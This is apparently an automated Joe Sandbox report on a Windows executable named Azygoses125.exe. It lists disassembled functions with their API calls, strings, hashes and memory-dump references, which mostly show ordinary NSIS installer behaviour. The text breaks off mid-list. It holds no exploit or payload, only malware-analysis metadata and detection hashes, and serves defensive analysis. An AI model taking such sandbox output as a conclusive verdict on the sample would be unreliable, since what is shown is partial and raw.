Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
Instruction ID: 2ee92d30c3d4f62541dcb72b74cb9552329c9a0a7836ec50a82d95606e957567
Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
Instruction Fuzzy Hash: 33015E71900218BAEB10DBA4DD85FFEBBBCAF54711F10412BBA51B61D0D7B4AA058BA4

Function 00402D04 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
wsprintfW.USER32 ref: 00402D56
SetWindowTextW.USER32(?,?), ref: 00402D66
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D78

Strings

verifying installer: %d%%, xrefs: 00402D4B, 00402D54
unpacking data: %d%%, xrefs: 00402D44

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 341d5f173f72d28821ee7b690774ab615ca69fb47453f4e2e3432960910f7c7f
Instruction ID: dce893d37650e0a5fad71f20df5db28da565fcefcb4dd95a10239a167aca93fc
Opcode Fuzzy Hash: 341d5f173f72d28821ee7b690774ab615ca69fb47453f4e2e3432960910f7c7f
Instruction Fuzzy Hash: 19F0367050020DABEF206F60DD49BEA3B69EF04309F00803AFA55B51D0DFBD59558F59

Function 00402840 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
GlobalFree.KERNEL32(?), ref: 004028E9
GlobalFree.KERNEL32(00000000), ref: 004028FC
CloseHandle.KERNEL32(?), ref: 00402914
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: c17071a172e6611300c6e5c6d8e6fb9818479fdaec624330b34eaa9cfd7f242d
Instruction ID: f14c02afffa7b7907a5fd564506058e77daa58a1031cefc6daed455ed9e34e83
Opcode Fuzzy Hash: c17071a172e6611300c6e5c6d8e6fb9818479fdaec624330b34eaa9cfd7f242d
Instruction Fuzzy Hash: FC216F72800118BBCF216FA5CE49D9E7E79EF09324F24423AF550762E0CB795E41DB98

Function 00404A9E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3F
wsprintfW.USER32 ref: 00404B48
SetDlgItemTextW.USER32(?,00423748), ref: 00404B5B

Strings

H7B, xrefs: 00404B31
%u.%u%s%s, xrefs: 00404B29

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$H7B
API String ID: 3540041739-107966168
Opcode ID: 2c37dc16e7f305192eed0ac62bbfad02487635509ea4f811ded0739848cee536
Instruction ID: bb4960df2745a4ac69d0d477934f6cb15a160bb02a324f12832b476a5784c287
Opcode Fuzzy Hash: 2c37dc16e7f305192eed0ac62bbfad02487635509ea4f811ded0739848cee536
Instruction Fuzzy Hash: 3611D873A441283BEB10656D9C45F9E329CDB81334F254237FA26F61D1E979D82146EC

Function 00402537 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,artikulationer\Udsorteringerne,000000FF,C:\Users\user~1\AppData\Local\Temp\nsq93A2.tmp\nsExec.dll,00000400,?,?,00000021), ref: 00402583
lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsq93A2.tmp\nsExec.dll,?,?,artikulationer\Udsorteringerne,000000FF,C:\Users\user~1\AppData\Local\Temp\nsq93A2.tmp\nsExec.dll,00000400,?,?,00000021), ref: 0040258E

Strings

C:\Users\user~1\AppData\Local\Temp\nsq93A2.tmp\nsExec.dll, xrefs: 00402552, 00402575, 00402589, 004025D5
artikulationer\Udsorteringerne, xrefs: 0040257C

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\nsq93A2.tmp\nsExec.dll$artikulationer\Udsorteringerne
API String ID: 3109718747-3652317350
Opcode ID: 35ecabcbfaf6731e74d8ae70dbfedeb1cffa6cf56a096f4227e0e6c723131c42
Instruction ID: 3fd77634d05d68e607a2feda7018aaef600362da1068c31595f6dded202503df
Opcode Fuzzy Hash: 35ecabcbfaf6731e74d8ae70dbfedeb1cffa6cf56a096f4227e0e6c723131c42
Instruction Fuzzy Hash: 33112772A01204BBDB10AFB18F4AA9F32669F54344F20403BF402F61C1DAFC8E91566E

Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D00
GetClientRect.USER32(00000000,?), ref: 00401D0D
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
DeleteObject.GDI32(00000000), ref: 00401D4B

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 26223df348314c12187df1a3a086258d1616f78344ebc1c33a08eb5c9aa33e1f
Instruction ID: 2dd82fd711e3e4b5423ea32521429725dc25e45d8003ad5609f7a78d81fa071f
Opcode Fuzzy Hash: 26223df348314c12187df1a3a086258d1616f78344ebc1c33a08eb5c9aa33e1f
Instruction Fuzzy Hash: A7F0E172600504AFDB01DBE4DE88CEEBBBDEB48311B104476F541F51A1CA759D418B38

Function 00401D56 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D59
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
ReleaseDC.USER32(?,00000000), ref: 00401D86
CreateFontIndirectW.GDI32(0040CE00), ref: 00401DD1

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 9d7988e3cd0506f91b59542dc0528f3f2e9c950226118d3629809f720825c0ab
Instruction ID: 540f35f5a36947b42322164f575acfe4ce77a432ba8ecb6b2d0148fd83f79f8e
Opcode Fuzzy Hash: 9d7988e3cd0506f91b59542dc0528f3f2e9c950226118d3629809f720825c0ab
Instruction Fuzzy Hash: EF01A231544640EFE7015BB0EF4EB9A3F74A7A5341F144579F941B62E2CAB801258BAD

Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57

Strings

!, xrefs: 00401C13

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 11d4d904bb71dbb966a0ad9f723e74c8a428a9d9267570d3682b579917bfb7b7
Instruction ID: 8c23cbaaf3363c844559deeab64a920cb4d6fb7c8214554dffc13efcda3ce685
Opcode Fuzzy Hash: 11d4d904bb71dbb966a0ad9f723e74c8a428a9d9267570d3682b579917bfb7b7
Instruction Fuzzy Hash: FF219271940105BEEF01AFB4CE4AABE7B75EB44344F10403EF641B61D1D6B89A40D769

Function 00405BE2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,00425F50,Error writing temporary file. Make sure your temp folder is valid.,00405C56,00425F50,00425F50,771B3420,?,771B2EE0,00405994,?,771B3420,771B2EE0,"C:\Users\user\Desktop\Azygoses125.exe"), ref: 00405BF0
CharNextW.USER32(00000000), ref: 00405BF5
CharNextW.USER32(00000000), ref: 00405C0D

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405BE2

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: CharNext
String ID: Error writing temporary file. Make sure your temp folder is valid.
API String ID: 3213498283-4064111799
Opcode ID: f220efeea37ee359dd6515a544f61222e30bb784142ca8a223f370c395045e43
Instruction ID: 8ad88def47e2d38867cf9e91343d20e41dbac1805b4d4da5c0653217526e5d7e
Opcode Fuzzy Hash: f220efeea37ee359dd6515a544f61222e30bb784142ca8a223f370c395045e43
Instruction Fuzzy Hash: 2FF06261918F1D56EB317A584C55A7756B8EB96350B04843BD741B71C0D3BC48818EE9

Function 00405B37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,004033A3,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 00405B3D
CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,004033A3,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 00405B47
lstrcatW.KERNEL32(?,0040A014), ref: 00405B59

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405B37

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 2659869361-2382934351
Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
Instruction ID: 377234fc647d40db67a969affeec1c2d2c00c7240f2da489af686c3f2ce23dc9
Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
Instruction Fuzzy Hash: E1D05E711019246AC1117B448D04DDB63ACAE45300341046EF202B70A6C778695286FD

Function 004038DA Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(000002A4,C:\Users\user~1\AppData\Local\Temp\,0040370C,?), ref: 004038EC
CloseHandle.KERNEL32(00000278,C:\Users\user~1\AppData\Local\Temp\,0040370C,?), ref: 00403900

Strings

C:\Users\user~1\AppData\Local\Temp\nsq93A2.tmp, xrefs: 00403910
C:\Users\user~1\AppData\Local\Temp\, xrefs: 004038DF

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\nsq93A2.tmp
API String ID: 2962429428-117140819
Opcode ID: 818760232e500ac014ecc4659e20c47a416318d98e4cd696d1546b419abd0e17
Instruction ID: de49926bb72e77a98f9c5ce19ed8b4a608a10c25b77e0dec4f49a46a5066bf07
Opcode Fuzzy Hash: 818760232e500ac014ecc4659e20c47a416318d98e4cd696d1546b419abd0e17
Instruction Fuzzy Hash: E2E086B140071896C5246F7CAD4D9953A185F453357244326F078F60F0C7789A675A99

Function 00405256 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405285
CallWindowProcW.USER32(?,?,?,?), ref: 004052D6

Part of subcall function 00404293: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A5

Strings

, xrefs: 00405266

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 56cab98530d4ff4408cd9c369303e271687e5fa7c90705031ed2c8dc290fa65f
Instruction ID: e2cad66c9b02384d3be1b0302d87088ec840166322e374313d6fbb5223fafa3d
Opcode Fuzzy Hash: 56cab98530d4ff4408cd9c369303e271687e5fa7c90705031ed2c8dc290fa65f
Instruction Fuzzy Hash: 5D01B1B1210709AFEF208F51DD80A6B3B35EF85361F10813BFA00761D1C77A9C529E29

Function 00405B83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Azygoses125.exe,C:\Users\user\Desktop\Azygoses125.exe,80000000,00000003), ref: 00405B89
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Azygoses125.exe,C:\Users\user\Desktop\Azygoses125.exe,80000000,00000003), ref: 00405B99

Strings

C:\Users\user\Desktop, xrefs: 00405B83

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
